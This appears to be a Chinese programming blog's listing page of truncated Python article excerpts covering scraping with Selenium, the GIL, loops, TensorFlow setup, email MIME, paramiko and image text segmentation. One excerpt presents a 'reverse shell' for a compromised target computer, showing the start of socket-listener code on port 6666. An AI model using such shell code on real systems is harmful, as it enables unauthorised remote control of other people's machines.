在使用python做爬虫的过程中,有些页面的的部分数据是通过js异步加载的,js调用接口的请求中有时还带有些加密的参数很难破解无法使用requests这样的包直接爬取数据,因此需要借助seleniu来完成js的自动加载。通过selenium模拟浏览器的真是操作来获取页面中的所有请求,并且可以查找到一下页面上一些隐藏的元素,这些元素在html源码中无法看到,并且和能通过xpath和正则来捕获,因此需要使用selenium来查找隐藏元素,例如视频网站的播放按钮
系统 2019-09-27 17:57:29 2327
python代码的执行由python虚拟机来控制,虚拟机访问由GIL控制,保证其同一时刻只有一条线程运行。虽然python能运行多线程,但是因为GIL所以同一时刻只有一条线程在python解释器运行。多线程下python虚拟机按以下方式执行:1.设置GIL2.切换到一条线程去运行3.运行:a.执行python2虚拟机运行1000字节指令或者执行python3虚拟机运行时间15ms字节b.线程主动让出控制(遭遇sleep或者IO操作也将触发)4.把线程设置为
系统 2019-09-27 17:57:05 2327
有的时候我们在获取到目标电脑时候如果对方电脑又python编译环境时可以利用python反弹shell主要用到pythonos库和sokect库这里的服务端在目标机上运行fromsocketimport*fromosimport*s=socket(AF_INET,SOCK_STREAM)#IVP4寻址tcp协议s.bind(('',6666))#补丁端口s.listen(1)#开始监听一个队列whileTrue:sock,addr=s.accept()#返
系统 2019-09-27 17:56:31 2327
自我学习记录:如有问题,请帮助指正,勿喷。计算1+2+3+4,我们可以直接写表达式print(1+2+3+4)但是如果数字多了,就会很累python的循环有两种,一种是forxin...循环,依次把list或者tuple里面的元素迭代出来,比如names=('Sam','Max','Leo')fornameinnames:print(name)执行的这段代码,就依次打印了names的每一个元素所以forxin...循环就是把每个元素代入变量x,然后执行缩进
系统 2019-09-27 17:56:01 2327
学英语广告最近也许是刚开学的原因,不管是公众号,还是刷抖音,导出都能看到关于学英语、背单词的广告。不知道现在学生们背单词买的什么辅导材料。反正我们上学那会,《星火阅读》特别的火。记得当时随书还送一个红色的塑料膜。书中英语单词是红色的其他文字是黑色的。背单词的时候先把塑料膜盖在书上,然后就只能看到翻译和音标,从而起到自测英语的作用。一页看完了取下塑料膜,再核对哪些单词记错了。就这么一个无脑的功能,当时的我们都觉得好犀利,谁一本这样的背单词书,都不好意思出去装
系统 2019-09-27 17:55:27 2327
在使用TensorFlow的object_detection模块问题记录:配置:window10tensorflow-gpuprotoc3.8版本下载地址:https://github.com/protocolbuffers/protobuf/releases1.ImportError:Nomodulenamed'object_detection'问题:①将自己下载的models-master模块添加进去系统环境变量②在F:\Anaconda\envs\自
系统 2019-09-27 17:53:39 2327
前几天遇到一个问题,需要把网页中的一部分内容挑出来,于是找到了urllib和HTMLParser两个库.urllib可以将网页爬下来,然后交由HTMLParser解析,初次使用这个库,在查官方文档时也遇到了一些问题,在这里写下来与大家分享.一个例子复制代码代码如下:fromHTMLParserimportHTMLParserclassMyHTMLParser(HTMLParser):defhandle_starttag(self,tag,attrs):pr
系统 2019-09-27 17:52:26 2327
基本思路就是,使用MIMEMultipart来标示这个邮件是多个部分组成的,然后attach各个部分。如果是附件,则add_header加入附件的声明。在python中,MIME的这些对象的继承关系如下。MIMEBase|--MIMENonMultipart|--MIMEApplication|--MIMEAudio|--MIMEImage|--MIMEMessage|--MIMEText|--MIMEMultipart一般来说,不会用到MIMEBase,
系统 2019-09-27 17:50:33 2327
前言paramiko模块是基于Python实现的SSH远程安全连接,可以提供在远程服务器上执行命令、上传文件到服务器或者从指定服务器下载文件的功能。paramiko模块安装方法paramiko模块不是python自带的标准库,需要自行下载安装,建议使用pip自动安装。方法如下:(1)配置pip命令和镜像源路径。如果已配置,跳过。(2)执行pipinstallparamiko进行安装。出现successful字样表示安装完成。paramiko常用函数介绍SS
系统 2019-09-27 17:49:26 2327
本文实例为大家分享了python实现图片中文字分割的具体代码,供大家参考,具体内容如下1、原始图片(包含数字):结果图:2、原始图片(包含文字):结果图:3、代码如下:importcv2importnumpyasnppath='test.jpg'root='output\\'#图像resizedsize=36img=cv2.imread(path)data=np.array(img)height=data.shape[0]width=data.shape[
系统 2019-09-27 17:47:28 2327